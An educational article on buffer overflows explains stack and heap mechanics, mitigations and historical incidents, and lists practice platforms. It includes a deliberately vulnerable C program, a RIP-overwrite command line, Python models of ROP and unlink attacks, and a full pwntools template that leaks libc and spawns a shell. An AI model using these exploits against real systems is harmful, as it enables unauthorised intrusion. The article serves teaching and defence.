Buffer Overflow Explained — Stack Mechanics, Exploits, and Mitigations

Date: 2026-05-10 · approx. 19 min read

Buffer Overflow (BOF) is the classic-of-classics among memory-safety vulnerabilities: writing past the end of an allocated buffer and corrupting the adjacent memory region. From the 1988 Morris Worm to glibc CVE-2024-2961 in 2024, it has remained an active attack surface. This article covers stack BOF mechanics, an overview of heap BOF, the mitigation/bypass arms race, historical incidents, and legitimate practice grounds — end to end.

01

Why BOF is still load-bearing #

"Surely in the age of Rust and Go this is an old problem?" is a tempting thought, but published statistics from the Microsoft Security Response Center and Google Project Zero report that "about 70% of our CVEs are still memory safety bugs". The bulk of the code carrying modern infrastructure — Linux kernel, Windows internals, Chrome, Firefox, OpenSSL, FFmpeg — is still written in C/C++.

The reason BOF persists comes back to the foundational design of C/C++.

  • No bounds checking on array access: neither the compiler nor the runtime stops you from writing buf[1000000]
  • Standard functions take no "size of the destination" argument: strcpy / gets / sprintf / memcpy all trust the input length and just write
  • Pointers can point at arbitrary memory: out-of-bounds references and accesses that bypass the allocator are both possible
  • Memory ownership is not tracked at compile time: use-after-free and double-free cannot be prevented statically
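
The first two points can be modelled without touching real C. The sketch below is a Python illustration built on the standard `ctypes` module; the `Record` struct and its `is_admin` field are hypothetical names invented for this example. An unchecked copy, which is how `memcpy` behaves, spills from an 8-byte buffer into the field stored right after it, while the checked variant refuses the write.

```python
import ctypes


class Record(ctypes.Structure):
    # Hypothetical layout: an 8-byte buffer directly followed by a flag.
    _fields_ = [
        ("buf", ctypes.c_char * 8),
        ("is_admin", ctypes.c_uint32),
    ]


def unchecked_copy(rec: Record, data: bytes) -> None:
    """Copy like memcpy(rec.buf, data, len): the length is simply trusted."""
    # Stay inside the struct so the demo never corrupts the Python process.
    if len(data) > ctypes.sizeof(rec):
        raise ValueError("demo input exceeds the modelled struct")
    ctypes.memmove(ctypes.addressof(rec), data, len(data))


def checked_copy(rec: Record, data: bytes) -> None:
    """Same copy, but the destination size is checked first."""
    if len(data) > Record.buf.size:
        raise ValueError("input larger than destination buffer")
    ctypes.memmove(ctypes.addressof(rec), data, len(data))


rec = Record()
unchecked_copy(rec, b"A" * 8 + b"\x01\x00\x00\x00")
print(rec.is_admin != 0)  # the adjacent field was overwritten
```

The only difference between the two functions is one comparison against the destination size, which is exactly the check C leaves to the programmer.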
▸ The long migration to memory-safe languages

Rust / Go / Swift / Java / Python / Ruby / C# / JavaScript structurally prevent these classes by having the compiler or runtime check them. Rust merging into the Linux kernel (2022 onward), Microsoft rewriting parts of Windows from C/C++ in Rust, and Android standardising on Rust for new native code are all consequences of this. Even so, the industry consensus is that a full replacement will take 20+ years.

02

How a stack-based BOF works #

Stack-based buffer overflow, the classic of classics, is best understood by looking at the function-call stack frame. The relative position of the local buffer and the saved return address is what makes the attack possible.

x86_64 Linux stack frame (high → low addresses) #

| Region | Role |
| --- | --- |
| Caller's arguments / environment | High end (e.g. 0x7fff...ff00) |
| ★ saved RIP (return address) | Points to the next instruction in the caller = the attack target |
| saved RBP | Base pointer of the previous stack frame |
| Local variables | Small variables inside the function |
| char buf[64] | The 64-byte buffer allocated on the stack (low end) |

Classic vulnerable stack-BOF code
```c
// vulnerable.c
#include <string.h>
#include <stdio.h>

void vulnerable(char *input) {
    char buf[64];          // 64 bytes on the stack
    strcpy(buf, input);    // ★ no size check → past 64 bytes the saved RIP is overwritten
    printf("%s\n", buf);
}

int main(int argc, char **argv) {
    if (argc > 1) vulnerable(argv[1]);
    return 0;
}
```

Build with every mitigation off and see the segfault
```shell
$ gcc -fno-stack-protector -no-pie -z execstack -O0 vulnerable.c -o vulnerable
# distance to saved RIP = buf + saved RBP = 64 + 8 = 72 bytes
$ ./vulnerable $(python3 -c 'print("A"*72 + "BBBBBBBB")')
Segmentation fault
# the saved RIP slot now holds 0x4242424242424242 (= "BBBBBBBB");
# ret faults on this non-canonical address, so a debugger shows it at the top of the stack
```
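
The 64 + 8 = 72 arithmetic can be replayed on a model of the frame. This is a Python sketch, not real process memory: the frame is a `bytearray` laid out as `buf[64]`, saved RBP, saved RIP from low to high addresses, and `strcpy_model` is a hypothetical stand-in for `strcpy` that copies up to the first NUL byte with no regard for the destination size. The saved register values are made up.

```python
import struct

BUF_SIZE = 64
RBP_OFF = BUF_SIZE               # saved RBP sits right above buf
RIP_OFF = BUF_SIZE + 8           # 64 + 8 = 72
FRAME_SIZE = RIP_OFF + 8 + 16    # plus a slice of the caller's frame
ORIGINAL_RIP = 0x401156          # made-up return address


def new_frame() -> bytearray:
    """Model frame: buf[64] | saved RBP | saved RIP | caller data."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<Q", frame, RBP_OFF, 0x7FFFFFFFE000)  # made-up saved RBP
    struct.pack_into("<Q", frame, RIP_OFF, ORIGINAL_RIP)
    return frame


def strcpy_model(frame: bytearray, src: bytes) -> None:
    """Copy src up to its first NUL plus a terminator, ignoring BUF_SIZE."""
    data = src.split(b"\x00", 1)[0] + b"\x00"
    if len(data) > len(frame):
        raise ValueError("input exceeds the modelled memory")
    frame[:len(data)] = data


def saved_rip(frame: bytearray) -> int:
    """Read the 8-byte little-endian return address slot."""
    return struct.unpack_from("<Q", frame, RIP_OFF)[0]


frame = new_frame()
strcpy_model(frame, b"A" * RIP_OFF + b"BBBBBBBB")
print(hex(saved_rip(frame)))  # 0x4242424242424242
```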

What the attacker stuffs into the input #

  • Shellcode injection: pack shellcode (a few dozen bytes of machine code that spawn /bin/sh) into the buffer, and overwrite the saved RIP with the buffer's own address. Blocked by NX (DEP)
  • ret2libc: point the saved RIP at libc's system() and pass the address of "/bin/sh" as its argument (in RDI on x86_64). Made much harder by ASLR unless a libc address leaks
  • ROP (Return-Oriented Programming): chain together existing code snippets (gadgets) that each end in ret to build arbitrary behaviour. The mainstream of modern BOF exploits
  • JOP / SROP / COOP: code-reuse relatives of ROP that chain through indirect jumps, sigreturn frames, and C++ virtual calls respectively
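
To make the ret2libc and ROP bullets concrete, here is how such a payload is typically laid out on x86_64, where the first argument travels in RDI. This is a Python sketch using only `struct`; `p64` is a local helper named after the pwntools function, and every address below is a made-up placeholder that in a real exploit would come from the target binary and a leaked libc base.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as an 8-byte little-endian word."""
    return struct.pack("<Q", value)


# Hypothetical addresses, for illustration only.
POP_RDI_RET = 0x401273        # gadget: pop rdi; ret
BIN_SH = 0x7FFFF7F5A678       # address of the string "/bin/sh"
SYSTEM = 0x7FFFF7E1D290       # address of system()
RIP_OFFSET = 72               # padding up to the saved RIP


def build_chain(offset: int, pop_rdi: int, bin_sh: int, system: int) -> bytes:
    chain = b"A" * offset     # fill buf and the saved RBP
    chain += p64(pop_rdi)     # first ret lands on the gadget
    chain += p64(bin_sh)      # popped into rdi by the gadget
    chain += p64(system)      # the gadget's ret jumps to system(rdi)
    return chain


payload = build_chain(RIP_OFFSET, POP_RDI_RET, BIN_SH, SYSTEM)
print(len(payload))  # 96
```

Each `ret` pops the next 8-byte word off the stack, which is why a sequence of addresses and data words behaves like a small program. Real chains often need an extra `ret` gadget for stack alignment, which this sketch leaves out.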
▸ The dangerous C standard library — "do not use" for 30 years
  • gets(): no size argument. Removed in C11 but still found in surviving code
  • strcpy() / strcat() / sprintf(): no size argument. The strncpy family has its own pitfall: when the source fills the buffer, no NUL terminator is written
  • scanf("%s", buf): an unsized %s is effectively gets(). For a 64-byte buffer you need %63s
  • memcpy(dst, src, attacker_controlled_len): if the length is attacker-controlled, the bug is the same
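
The `strncpy` pitfall is easy to miss, so here is a Python model of the two behaviours. `strncpy_model` and `snprintf_model` are hypothetical helpers that mimic the C semantics on `bytes`; they are illustrations under that assumption, not bindings to libc.

```python
from typing import Tuple


def strncpy_model(src: bytes, n: int) -> bytes:
    """Return the n bytes that strncpy(dst, src, n) leaves in dst."""
    s = src.split(b"\x00", 1)[0]
    if len(s) >= n:
        return s[:n]                    # buffer full: NO terminator written
    return s + b"\x00" * (n - len(s))   # short source: padded with NULs


def snprintf_model(src: bytes, size: int) -> Tuple[bytes, int]:
    """Model snprintf(dst, size, "%s", src).

    Returns (bytes written to dst, length the full output would have had),
    so the caller can detect truncation as needed >= size.
    """
    s = src.split(b"\x00", 1)[0]
    if size == 0:
        return b"", len(s)
    return s[: size - 1] + b"\x00", len(s)


dst = strncpy_model(b"A" * 64, 64)
print(b"\x00" in dst)            # False: no terminator anywhere in dst

out, needed = snprintf_model(b"A" * 100, 64)
print(out.endswith(b"\x00"), needed >= 64)   # terminated, truncation detectable
```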
03

Heap-based BOF — targeting chunk metadata #

BOF that happens on the heap (regions allocated with malloc() / new) rather than the stack is heap BOF. It doesn't grab PC as directly as stack BOF, but by corrupting the heap allocator's bookkeeping metadata it can be developed into arbitrary memory write (write-what-where).

In glibc's malloc (ptmalloc2), each chunk has a header [prev_size | size | data...], and freed chunks in the regular bins are joined into a doubly-linked list through fd / bk pointers stored at the start of the data area. Overwriting the fd / bk pointers of an adjacent free chunk via a heap BOF lets a later unlink() write to an arbitrary address: the classic "unlink attack".
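
The unlink write can be traced on a toy memory model. The Python sketch below represents memory as a dictionary from address to 8-byte value and assumes the 64-bit chunk layout, in which `fd` sits at offset 0x10 and `bk` at offset 0x18 from the chunk start. The addresses are invented, and `unlink_unchecked` / `unlink_checked` are simplified stand-ins for the historical and the hardened logic, not glibc's actual source.

```python
FD_OFF = 0x10   # offset of fd within a free chunk (64-bit layout)
BK_OFF = 0x18   # offset of bk within a free chunk


def unlink_unchecked(mem: dict, p: int) -> None:
    """Historical unlink: FD->bk = BK; BK->fd = FD, with no validation."""
    fd = mem[p + FD_OFF]
    bk = mem[p + BK_OFF]
    mem[fd + BK_OFF] = bk
    mem[bk + FD_OFF] = fd


def unlink_checked(mem: dict, p: int) -> None:
    """Hardened unlink: both neighbours must point back at p."""
    fd = mem[p + FD_OFF]
    bk = mem[p + BK_OFF]
    if mem.get(fd + BK_OFF) != p or mem.get(bk + FD_OFF) != p:
        raise RuntimeError("corrupted double-linked list")
    mem[fd + BK_OFF] = bk
    mem[bk + FD_OFF] = fd


CHUNK = 0x1000          # made-up address of the corrupted free chunk
TARGET = 0x601018       # made-up address the attacker wants to overwrite
VALUE = 0x7000          # made-up attacker-chosen value (must itself be writable)

# The overflow has replaced fd / bk with attacker-controlled values.
mem = {CHUNK + FD_OFF: TARGET - BK_OFF, CHUNK + BK_OFF: VALUE}
unlink_unchecked(mem, CHUNK)
print(hex(mem[TARGET]))  # 0x7000
```

The second write (`BK->fd = FD`) also lands at `VALUE + 0x10`, which is why the classic attack needs the written value to point at writable memory.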

Modern glibc added a lot of consistency checks to unlink(), but House of Force / House of Spirit / fastbin dup / tcache poisoning / large bin attack and other generation-specific techniques keep being published. The tcache family (tcache was introduced in glibc 2.26) is a particularly active area of new attacks.

Memory-safety vulnerabilities alongside heap BOF #

  • Use-After-Free (UAF): use a pointer after free() → the memory has been reused for something else, so writing corrupts that other data
  • Double Free: free() the same pointer twice → the free list is destroyed
  • Type Confusion: treat an object as a different type (frequent in C++ vtables)
  • Out-of-Bounds Read: Heartbleed (CVE-2014-0160) is the canonical example. Not writing, but reading: the contents of adjacent memory leak
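
The out-of-bounds read case fits in a few lines. This Python sketch models the Heartbleed pattern, where a response is built from the length the peer claims rather than the length actually received. The memory layout, the `SECRET` bytes, and both function names are made up for illustration; the real bug lived in OpenSSL's C heartbeat handler.

```python
SECRET = b"-----PRIVATE KEY-----"   # stand-in for unrelated adjacent heap data


def make_memory(payload: bytes) -> bytes:
    """Model heap: the request payload followed directly by other data."""
    return payload + SECRET


def heartbeat_vulnerable(payload: bytes, claimed_len: int) -> bytes:
    """Echo claimed_len bytes, trusting the attacker-supplied length."""
    return make_memory(payload)[:claimed_len]


def heartbeat_fixed(payload: bytes, claimed_len: int) -> bytes:
    """Echo only if the claimed length fits the payload actually received."""
    if claimed_len > len(payload):
        return b""                   # malformed request: discard it
    return make_memory(payload)[:claimed_len]


print(heartbeat_vulnerable(b"hat", 3 + len(SECRET)))  # payload plus leaked bytes
print(heartbeat_fixed(b"hat", 3 + len(SECRET)))       # nothing is echoed
```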
▸ All of these share the same root: the language doesn't check pointer validity at compile time

BOF / UAF / double free / type confusion / OOB read are all consequences of the same C/C++ design choice — neither memory ownership nor bounds are tracked by the language.

04

The mitigation / bypass arms race #

Since BOF can't be eliminated outright, the OS, compiler, and hardware have layered mitigations on top of each other. Every mitigation has a bypass.

| Mitigation | Introduced | Goal | Main bypass |
| --- | --- | --- | --- |
| Stack Canary (SSP) | 1998 (StackGuard) → standardized 2000s | Place a secret value just before saved RIP and verify it before return | Leak the canary via info leak / reach ret through a different path |
| DEP / NX bit | 2003-2005 | Mark data regions non-executable → shellcode in buf can't run | ROP (chain existing code snippets) / ret2libc |
| ASLR | 2001 (PaX) → mainline 2005 | Randomize load addresses of stack / heap / libc / executable | info leak / partial overwrite / brute force (32-bit) / BROP |
| PIE | Standard from the 2010s | Randomize the main executable too | info leak the executable base / GOT overwrite |
| CFI / Intel CET / ARM PAC | 2018-2020s | Verify indirect-call targets and ret destinations at runtime | data-only attacks that stay within CFI / COOP |
| Memory-Safe Languages | Rust 2015 / Go 2009 / Swift 2014 | Build bounds checks into the language itself, so BOF is impossible in principle | Bugs inside unsafe blocks / C reached via FFI |

A modern binary (anything distributed by a Linux distro) typically ships with all five: SSP + DEP + ASLR + PIE + RELRO (RELRO makes relocation data such as the GOT read-only after startup). You can confirm with checksec.sh or pwntools' checksec; missing even one significantly lowers exploit difficulty.
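
How the canary check fires, and why a leak defeats it, can be shown on a model frame. In this Python sketch the frame is `buf[64]`, an 8-byte canary, then saved RBP and saved RIP. The layout, `call_with_input`, and the exception class are illustrative assumptions; a real compiler emits the comparison in the function epilogue and calls `__stack_chk_fail` on mismatch.

```python
import secrets
import struct

BUF_SIZE = 64
CANARY_OFF = BUF_SIZE            # canary sits right above buf
RIP_OFF = BUF_SIZE + 16          # canary (8) + saved RBP (8)
FRAME_SIZE = RIP_OFF + 8
ORIGINAL_RIP = 0x401156          # made-up return address


class StackSmashingDetected(Exception):
    """Stands in for the abort triggered by __stack_chk_fail."""


def call_with_input(data: bytes, canary: bytes) -> int:
    """Model a protected function; returns the address it would return to."""
    if len(data) > FRAME_SIZE:
        raise ValueError("input exceeds the modelled frame")
    frame = bytearray(FRAME_SIZE)
    frame[CANARY_OFF:CANARY_OFF + 8] = canary
    struct.pack_into("<Q", frame, RIP_OFF, ORIGINAL_RIP)
    frame[:len(data)] = data     # unchecked copy into buf
    if bytes(frame[CANARY_OFF:CANARY_OFF + 8]) != canary:
        raise StackSmashingDetected("canary changed before ret")
    return struct.unpack_from("<Q", frame, RIP_OFF)[0]


# Assumption: a random canary whose first byte is NUL, as glibc uses on x86_64.
canary = b"\x00" + secrets.token_bytes(7)

try:
    call_with_input(b"A" * FRAME_SIZE, canary)
except StackSmashingDetected as exc:
    print("blocked:", exc)

# With the canary leaked, the attacker writes it back in place.
leaked = b"A" * BUF_SIZE + canary + b"B" * 8 + struct.pack("<Q", 0xDEADBEEF)
print(hex(call_with_input(leaked, canary)))  # 0xdeadbeef
```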

Check a binary's mitigations at a glance
```shell
$ checksec --file=./vulnerable
RELRO       STACK CANARY   NX          PIE          RPATH     RUNPATH     Symbols     FORTIFY
Full RELRO  Canary found   NX enabled  PIE enabled  No RPATH  No RUNPATH  No symbols  Yes

# From pwntools in Python
$ python3 -c 'from pwn import *; print(ELF("./vulnerable").checksec())'
```
▸ "All mitigations enabled" does not equal "unexploitable"

Combine one info leak (arbitrary read) with one BOF and a modern exploit can punch through nearly any protection stack. Pwn2Own produces multiple full sandbox escapes per year across Chrome, Safari, iOS, and the Windows kernel. Mitigations raise the wall; they do not make it impassable.
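
The "one info leak" step usually boils down to a subtraction. The Python sketch below recovers a library base from a leaked function pointer and derives another symbol's runtime address. The offsets and the leaked value are invented for the example and would normally be read from the target's actual `libc.so.6`.

```python
PAGE_MASK = 0xFFF

# Made-up symbol offsets inside a hypothetical libc build.
OFFSETS = {"puts": 0x80E50, "system": 0x50D70}


def libc_base_from_leak(leak: int, symbol: str, offsets=OFFSETS) -> int:
    """Base address = leaked runtime address - the symbol's file offset."""
    base = leak - offsets[symbol]
    if base & PAGE_MASK:
        # A load base is page-aligned; anything else means a wrong guess.
        raise ValueError("base is not page-aligned: wrong libc or bad leak")
    return base


def resolve(base: int, symbol: str, offsets=OFFSETS) -> int:
    """Runtime address of any other symbol once the base is known."""
    return base + offsets[symbol]


leak = 0x7F1234A80E50                      # pretend puts() leaked this
base = libc_base_from_leak(leak, "puts")
print(hex(base))                           # 0x7f1234a00000
print(hex(resolve(base, "system")))        # 0x7f1234a50d70
```

ASLR randomizes the base but not the distances between symbols inside one library, so a single leaked pointer is enough to locate everything else in it.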

05

Historical incidents — BOFs that changed the world #

| Year | Incident | Mechanism | Impact |
| --- | --- | --- | --- |
| 1988 | Morris Worm | Stack BOF in fingerd's gets() + sendmail debug + rsh brute force | Took down ~10% of the Internet. The first Internet worm. Triggered the founding of CERT |
| 1996 | Aleph One "Smashing the Stack" (Phrack 49) | First textbook-level explanation of stack BOF and shellcode authoring | The starting point of modern exploitation. Still cited as a classic |
| 2001 | Code Red (CVE-2001-0500) | BOF against IIS Index Server | Infected 350,000 Windows servers; designed to DDoS the White House |
| 2003 | SQL Slammer (CVE-2002-0649) | A 376-byte UDP BOF packet against MS SQL Server 2000 | Spread to 75,000 hosts in 10 minutes; congested global bandwidth; took ATMs offline |
| 2014 | Heartbleed (CVE-2014-0160) | Out-of-bounds READ in the OpenSSL TLS heartbeat | 17% of HTTPS servers exposed private keys / session data / passwords |
| 2017 | WannaCry / EternalBlue (CVE-2017-0144) | Heap overflow when parsing an SMBv1 structure | 200,000+ Windows machines hit with ransomware. NHS / railways / car factories halted |
| 2024 | glibc CVE-2024-2961 | Out-of-bounds write in iconv's ISO-2022-CN-EXT | PoC published showing how PHP filter chains develop it into RCE |
▸ Memory-safety vulnerabilities did not vanish in 30 years

This fact is exactly what motivates Microsoft / Google to switch new code to Rust. The Linux kernel accepting Rust (2022), portions of the Windows kernel moving to Rust, and Android standardising on Rust for new native code are all downstream of this realization.

06

How to learn — legitimate practice platforms #

Trying any of this on someone else's system is unauthorized access, a criminal offence. The right entry point is a deliberately vulnerable practice environment.

| Platform | Content | Difficulty |
| --- | --- | --- |
| pwn.college | Free Arizona State University course. Curriculum from stack BOF → ROP → kernel exploits | Beginner to advanced |
| pwnable.kr | The veteran Korean pwn site. Level-graded vulnerable binaries | Beginner to advanced |
| pwnable.tw | Taiwan's advanced pwn site. Strong heap / kernel exploits | Intermediate to elite |
| picoCTF | Beginner CTF hosted by Carnegie Mellon. picoGym is permanently available | Beginner |
| HackTheBox | General challenges → Pwn category | Beginner to advanced |
| OverTheWire (Narnia, Behemoth, Vortex) | Classic BOF / format string wargames | Beginner to intermediate |
| Microcorruption | Matasano's embedded-device (MSP430) BOF wargame | Beginner to intermediate |
| Exploit-Education (Phoenix, Nebula) | A series that raises protections step by step | Beginner to intermediate |

Required tools (most are packaged for Kali Linux) #

The standard set for dynamic analysis, static analysis, and exploit development
```shell
# Dynamic analysis / debuggers
$ gdb                            # with pwndbg / GEF / peda: enhanced GDB (essential for modern pwn)
$ strace -f ./vulnerable         # syscall trace
$ ltrace ./vulnerable            # library-call trace

# Static analysis / binary analysis
$ checksec --file=./bin          # confirm mitigations
$ ROPgadget --binary ./bin       # enumerate ROP gadgets
$ ropper --file ./bin            # same idea, alternative implementation
$ objdump -d ./bin | less        # disassembly
$ radare2 ./bin                  # lightweight reverse engineering
$ ghidra                         # NSA's GUI decompiler

# Exploit development
$ python3                        # with pwntools: de facto standard for exploit scripts
$ one_gadget ./libc.so.6         # enumerate one-shot execve('/bin/sh') addresses inside libc
```
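
One job these tools automate is finding the distance to the saved RIP. pwntools ships a `cyclic` helper for it; the Python sketch below is a simplified standard-library take on the same idea, using a Metasploit-style `Aa0Aa1...` pattern rather than pwntools' de Bruijn sequence. The function names are hypothetical.

```python
import itertools
import string

MAX_PATTERN = 26 * 26 * 10 * 3   # number of distinct 3-byte groups times 3


def pattern_create(length: int) -> bytes:
    """Build a pattern of unique 3-byte groups: Aa0Aa1Aa2...Ab0Ab1..."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would start repeating")
    out = bytearray()
    groups = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
    for upper, lower, digit in groups:
        if len(out) >= length:
            break
        out += (upper + lower + digit).encode()
    return bytes(out[:length])


def pattern_offset(pattern: bytes, needle: bytes) -> int:
    """Offset of the bytes observed in the crashed return-address slot (-1 if absent)."""
    return pattern.find(needle)


pattern = pattern_create(200)
# Pretend the debugger showed these 8 bytes where the saved RIP used to be.
observed = pattern[72:80]
print(pattern_offset(pattern, observed))  # 72
```

Feeding the pattern to the target and looking up the bytes found at the crash site replaces the manual 64 + 8 calculation, which matters once compiler padding makes the layout less obvious.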

A minimal pwntools exploit template #

info leak → ROP chain → shell
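```python
from pwn import *

# Template assumptions: the target reads its payload from stdin with an
# unbounded read, has no PIE and no canary, and the saved RIP is 72 bytes in.
elf = context.binary = ELF("./vulnerable")
libc = ELF("./libc.so.6")
p = process(elf.path)   # local; use remote("host", port) for remote
OFFSET = 72             # padding to saved RIP

# 1. info leak to get libc base: call puts(puts@got), then re-enter main
stage1 = ROP(elf)
stage1.puts(elf.got["puts"])
stage1.main()
p.sendline(b"A" * OFFSET + stage1.chain())
# if the target echoes its input before returning, add a p.recvline() here first
leak = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leak - libc.sym["puts"]   # rebases libc.sym and libc.search

# 2. build the ROP chain against the rebased libc
rop = ROP(libc)
rop.system(next(libc.search(b"/bin/sh\x00")))
p.sendline(b"A" * OFFSET + rop.chain())
p.interactive()   # shell
```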
▸ Never run this against anything outside a CTF / practice platform

Trying any of this on a real service is a crime the moment you do it. Even an internal pentest at your employer requires a written Rules of Engagement (RoE). The same legal and ethical framing as in the Kali Linux article applies here.

07

Summary — an honest take as of 2026 #

  • BOF is the consequence of a 1970s language design decision: "C/C++ doesn't bounds-check memory." For 30+ years it has been a primary Internet-scale attack surface
  • Stack BOF (strcpy past the end → overwrite saved RIP → seize control on ret) and heap BOF (corrupt chunk metadata → write-where) share the same root
  • Reading the history as an arms race, with mitigations piling up (SSP / DEP / ASLR / PIE / CFI) and bypasses evolving (ROP / info leak / heap grooming), gives you a map for reading modern memory-safety CVE writeups
  • The real answer is rewriting in memory-safe languages. With full replacement still 20+ years away, the practical mix is:
    • Verify the mitigation stack is correctly enabled with checksec
    • Catch memory-safety bugs early with fuzzing
    • Start new projects in Rust / Go
    • For existing C/C++, prefer bounds-checked alternatives (snprintf / strncpy_s where C11 Annex K is available / Rust wrappers)